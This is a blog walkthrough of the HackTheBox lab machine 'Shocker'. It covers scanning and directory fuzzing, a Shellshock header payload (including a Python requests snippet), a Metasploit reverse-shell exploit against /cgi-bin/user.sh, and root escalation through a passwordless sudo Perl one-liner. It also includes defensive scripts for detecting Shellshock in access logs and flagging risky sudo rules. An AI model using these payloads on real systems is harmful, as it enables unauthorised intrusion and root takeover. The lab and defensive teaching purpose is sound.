Hi everyone!
Today’s post is on Shocker, an easy GNU/Linux machine on HackTheBox. It was created on 1st October 2017. It is a very easy machine that can probably be pwned in less than 10 minutes; the only time-consuming part is choosing the right tool for enumeration. This machine is about exploiting the Shellshock vulnerability to gain access to the server and abusing the Perl GTFOBins entry for privilege escalation (PE). Read on if you are interested. Let’s get started!

Tools required
- Nmap
- Dirbuster
- Metasploit (Optional)
Nmap analysis
First things first, we have to start with a port scan to see which services are available on the machine.
┌──(soulx㉿kali)-[~]
└─$ IP=10.10.10.56

┌──(soulx㉿kali)-[~]
└─$ nmap -A -p1-9999 -v 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 10:54 +08
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating Ping Scan at 10:54
Scanning 10.10.10.56 [2 ports]
Completed Ping Scan at 10:54, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:54
Completed Parallel DNS resolution of 1 host. at 10:54, 0.20s elapsed
Initiating Connect Scan at 10:54
Scanning 10.10.10.56 [9999 ports]
Discovered open port 80/tcp on 10.10.10.56
Increasing send delay for 10.10.10.56 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 2222/tcp on 10.10.10.56
Connect Scan Timing: About 16.46% done; ETC: 10:57 (0:02:37 remaining)
Connect Scan Timing: About 33.34% done; ETC: 10:57 (0:02:02 remaining)
Increasing send delay for 10.10.10.56 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.56 from 10 to 20 due to max_successful_tryno increase to 6
Connect Scan Timing: About 47.29% done; ETC: 10:57 (0:01:41 remaining)
Connect Scan Timing: About 61.57% done; ETC: 10:57 (0:01:16 remaining)
Connect Scan Timing: About 76.00% done; ETC: 10:57 (0:00:48 remaining)
Completed Connect Scan at 10:57, 202.64s elapsed (9999 total ports)
Initiating Service scan at 10:57
Scanning 2 services on 10.10.10.56
Completed Service scan at 10:57, 6.42s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.56.
Initiating NSE at 10:57
Completed NSE at 10:57, 5.22s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.82s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Nmap scan report for 10.10.10.56
Host is up (0.15s latency).
Not shown: 9997 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.67 seconds
We can see that two ports are open: Apache HTTP on port 80 and SSH on port 2222.
Let’s go to the website to take a look.
Overview of the website

The website is really simple, with just an image. I looked at the source code and the response headers, and there was nothing interesting. I even downloaded the image from the website and ran it through strings to see if there was anything useful. Unfortunately, it was futile.
Fuzz web directory
Initially, when I tried Gobuster, I couldn’t find anything useful despite using a large word list with the .php, .pl, .html, .jsp, .txt, and .sh extensions. However, once I used Dirbuster, I was able to find something interesting.
┌──(soulx㉿kali)-[~]
└─$ dirbuster http://$IP -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e pl,php,html,jsp,sh,txt
This will immediately spawn a GUI window. Fill in the URL; the rest of the fields should already be filled in from the flags we passed on the command line.

Once we click Start and let it run for a while, we should see an interesting result:
... File found: //cgi-bin/user.sh - 200 ...
If we can access a Bash script in the /cgi-bin folder, this is most likely a Shellshock challenge, given that the machine’s name is Shocker.
What is Shellshock?
Shellshock (CVE-2014-6271) is a vulnerability in the Unix Bash shell that was discovered in 2014; the bug had existed for more than 20 years before it was found. You can watch a short video on Shellshock by Tom Scott here. Basically, a vulnerable version of Bash will execute certain strings as commands. Take the environment variable below:
┌──(soulx㉿kali)-[~]
└─$ x='This is a string'

┌──(soulx㉿kali)-[~]
└─$ echo $x
This is a string
When we assign the string to the environment variable ‘x’, Bash treats the content as a plain string. However, if we put a function definition at the start of the string, the content after it is treated as Bash commands.
┌──(soulx㉿kali)-[~]
└─$ x='() { :; }; whoami'
soulx

┌──(soulx㉿kali)-[~]
└─$
Notice that the whoami command was executed? If a vulnerable version of Bash receives a value beginning with () { :; };, it treats the whole string as a function definition followed by commands to run, i.e. like a shell script.
If we look at the article by Cloudflare here, we will learn that the vulnerability can be exploited in Apache web servers that use the Common Gateway Interface (CGI) via web request headers (e.g. User-Agent, Referer, etc.), because the CGI module copies those headers into environment variables before running the script. For example, if we exploit via User-Agent:
import requests

# The Shellshock payload is carried in the User-Agent header.
headers = {'User-Agent': "() { :; }; whoami"}
url = "http://10.10.10.56"
response = requests.get(url, headers=headers)
On the server, the CGI handler will turn this header into an environment variable:
HTTP_USER_AGENT=() { :; }; whoami
As such, when Bash imports that variable it will execute the whoami command.
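From the defender’s side, the same header-to-environment path is what you hunt for in web server logs. The following is an added example, not code from the original post: it parses Apache combined-format access log lines and flags requests whose request line, Referer or User-Agent carries the Bash function-definition prefix that Shellshock keys on. The three log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload starts with an exported Bash function definition "() {";
# whatever follows the closing brace is what a vulnerable Bash runs on import.
SHOCK_RE = re.compile(r"\(\)\s*\{")

# mod_cgi copies these request fields into the CGI environment, so these are the
# attacker-controlled fields worth inspecting: request line, Referer, User-Agent.
INSPECT = ("req", "ref", "ua")

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def shellshock_fields(entry):
    """Names of the fields in one parsed entry that carry the Shellshock prefix."""
    # Percent-decode first so an encoded "() {" in the request line is also caught.
    return [f for f in INSPECT if SHOCK_RE.search(unquote(entry[f]))]

def scan(lines):
    """Scan log lines and return one hit per request carrying a payload."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        fields = shellshock_fields(entry)
        if fields:
            hits.append({"ip": entry["ip"], "ts": entry["ts"],
                         "request": entry["req"], "fields": fields})
    return hits

# Constructed sample lines (not real traffic): a benign request, a payload in
# User-Agent (the header the Metasploit module uses by default), one in Referer.
SAMPLE_LOG = [
    '10.10.14.24 - - [15/Jul/2021:10:54:01 +0800] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.24 - - [15/Jul/2021:12:07:19 +0800] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; whoami"',
    '10.10.14.24 - - [15/Jul/2021:12:08:02 +0800] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "(){ :;}; whoami" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["request"]} <- payload in {hit["fields"]}')
```

Run it against a real access.log by replacing SAMPLE_LOG with the file’s lines; any hit on a path under /cgi-bin on an unpatched Bash is a likely compromise, not just an attempt.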
Access the web server with Metasploit through Shellshock and obtain the user flag
For this write-up, I will be using Metasploit. You can also build your own exploit that runs a Bash reverse shell with Netcat listening on a port, or refer to this exploit on Exploit-DB here and make the necessary changes. However, I won’t be doing so, since Metasploit already has the exploit and payload for it. This helps me clear the machine quickly without spending time debugging if anything goes wrong.
Exploit with the Metasploit Shellshock module
First, launch Metasploit with the msfconsole command.
We will then search for the Shellshock exploit for Apache that targets cgi-bin, since we found that /cgi-bin/user.sh is accessible when we fuzzed the web directories. Note that Metasploit uses the User-Agent header for the Shellshock exploit by default (the HEADER option). Remember to set your LHOST (your IP address), RHOSTS (the machine’s IP address), and TARGETURI (the .sh file we found in the /cgi-bin folder).
msf6 > search shellshock

Matching Modules
================

   #   Name                                                Disclosure Date  Rank       Check  Description
   -   ----                                                ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec   2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec     2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env      2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3   exploit/multi/http/cups_bash_env_exec               2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   4   auxiliary/server/dhclient_bash_env                  2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   5   exploit/unix/dhcp/bash_environment                  2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   6   exploit/linux/http/ipfire_bashbug_exec              2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                  2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/osx/local/vmware_bash_function_root         2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   9   exploit/multi/ftp/pureftpd_bash_env_exec            2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   10  exploit/unix/smtp/qmail_bash_env_exec               2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   11  exploit/multi/misc/xdh_x_exec                       2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.10     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[+] 10.10.10.56:80 - The target is vulnerable.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.56:32948) at 2021-07-15 12:07:19 +0800

meterpreter >
We can see that we have successfully accessed the server.
Obtaining user flag
meterpreter > shell
Process 12175 created.
Channel 1 created.
whoami
shelly
pwd
/usr/lib/cgi-bin
cd $HOME
ls
user.txt
cat user.txt
95a*****************************
Obtaining root flag
Obtaining the root flag is quite easy, as it takes less than 10 seconds. As usual, we start with the sudo -l command to find any commands the user account is allowed to run with root privileges.
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
We can see that Perl can be run as root via sudo without a password. We can easily find what to do with it on GTFOBins here. You are probably already familiar with Perl being used for command-line one-liner scripting; using Perl, we can launch a shell. This shell will immediately be a root shell, since Perl is being run through sudo.
sudo perl -e 'exec "/bin/sh";'
whoami
root
cat /root/root.txt
5cc***************************
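The lesson for whoever administers a box like this is that a sudo rule on an interpreter is a root rule in disguise. The following is an added example, not code from the original post: it parses the rule lines of sudo -l output and flags commands that run as root and are known to spawn a shell. The SHELL_ESCAPES list is an illustrative subset I assume here, not data taken from GTFOBins, and the second rule in the sample is a constructed addition to the machine’s real output.

```python
import re

# Binaries whose GTFOBins entries include a shell escape: a sudo rule that runs
# any of them as root is equivalent to a root shell. Illustrative subset, assumed.
SHELL_ESCAPES = {"perl", "python", "python2", "python3", "ruby", "lua",
                 "awk", "find", "vim", "vi", "less", "more", "bash", "sh"}

# One rule line as printed by `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/perl".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output):
    """Extract the rule lines that follow 'User ... may run the following commands'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line else None
        if m:
            rules.append({
                "runas": m["runas"].strip(),
                "tags": {t.strip() for t in m["tags"].split(":") if t.strip()},
                "cmds": [c.strip() for c in m["cmds"].split(",")],
            })
    return rules

def risky_rules(rules):
    """Return (command, passwordless) for every root-capable rule worth removing."""
    findings = []
    for rule in rules:
        # "(root)" or "(ALL : ALL)": the part before ':' lists the run-as users.
        runas_users = {u.strip() for u in rule["runas"].split(":")[0].split(",")}
        if not runas_users & {"root", "ALL"}:
            continue
        for cmd in rule["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_ESCAPES:
                findings.append((cmd, "NOPASSWD" in rule["tags"]))
    return findings

# The machine's own `sudo -l` output, plus one constructed rule that is not a shell escape.
SAMPLE_SUDO_L = """Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/sbin/reboot
"""

if __name__ == "__main__":
    for cmd, nopasswd in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd} runs as root{' without a password' if nopasswd else ''}: shell escape possible")
```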
I hope these tips have been helpful to you. Feel free to leave any comments below. You may also send me a tip if you like my work and want to see more of this kind of content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂